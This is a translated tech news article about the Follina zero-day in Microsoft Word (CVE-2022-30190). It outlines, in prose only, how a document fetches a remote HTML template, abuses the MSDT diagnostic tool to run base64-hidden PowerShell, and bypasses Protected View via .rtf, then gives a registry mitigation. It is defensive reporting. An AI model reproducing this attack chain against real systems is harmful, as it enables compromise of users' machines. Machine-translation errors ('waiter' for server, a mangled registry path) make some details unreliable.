You will also be interested
[EN VIDÉO] How to add checkboxes in Word? With this new tech tutorial from Futura, discover how to create checkboxes in Word. © Futura
By now almost everyone has heard that macros can be dangerous in Microsoft Word. After all, the software blocks them by default and displays a warning banner. However, this is not the only way to use the software to infect a computer. On Twitter, user @nao_sec shared discovered malicious code in a document Word.
This code uses a flaw called Follina. She is categorized as zero day », In other words, already exploited by hackers and without an update (Microsoft has “zero days” to release a patch). @nao_sec noticed the code in question by chance on the Virus Total site while searching for documents using another flaw. An Internet user located in Belarus would have submitted the document in question to the site in order to check whether it was detected by the various antiviruses.
A code hidden in base 64
The code uses the software’s remote template feature to load an HTML file from a waiter. This then diverts the tool from diagnostic from Microsoft Support (MSDT) to upload a file and run PowerShell commands. And this, even if macros are deactivated. The author of the code used the same technique as detected on some websites to conceal problematic commands: they are converted to base 64, and decoded at runtime.
The researchers do not know what the author’s exact purpose was, since the second file is no longer available. However, from the moment it manages to execute PowerShell commands, it can potentially take full control of the computer and attack other machines on the local network.
Follina is particularly problematic. By default, Word opens .docx files in Protected View. The code is then executed only if the user clicks on “Enable modification”. However, if it is in .rtf format, this protection is not activated. Moreover, in this case, it suffices to select it in the file explorer, without opening it, for the code to be executed.
A demonstration of how Follina works on an updated version of Office 2021. © Didier Stevens
A report already refused by Microsoft in April
The code works on all versions of Microsoft Office since at least 2013, including Office 2021, even with all updates. It turns out that the problem had already been reported to Microsoft in April by Shadow Chaser Group, a team of students chasing rifts. A man named John, of Microsoft Security Response Center (MSRC), was then content to say that it was not a security issue, and that the submitted sample did not work on his computer. Microsoft seems to have changed its mind, since on May 30 the firm registered the flaw under the reference CVE-2022-30190.
Currently, there is no easy way to protect against this attack. While waiting for an update, the most common solution seems to edit the registry to prevent the launch of the diagnostic tool from Word. To do this, we must create value EnableDiagnostics in HKLMSOFTWAREPoliciesMicrosoftWindowsScriptedDiagnostics and put it to 0.
But beware, this solution is reserved for advanced users. Any error in modifying the registry could damage the system and prevent the computer from starting.
Do you want to access Futura without being interrupted by advertising?
Discover our online subscriptions and browse without ads! At this moment, the Mag Futura is offered for a 3-month subscription to the subscription “I participate in the life of Futura”!
What is Mag Futura?
- Our first paper journal of more than 200 pages to make science accessible to as many people as possible
- A dive into the heart of 4 scientific themes that will mark 2022, from the Earth to the Moon
*Mag Futura is sent after the third month of registration.
Interested in what you just read?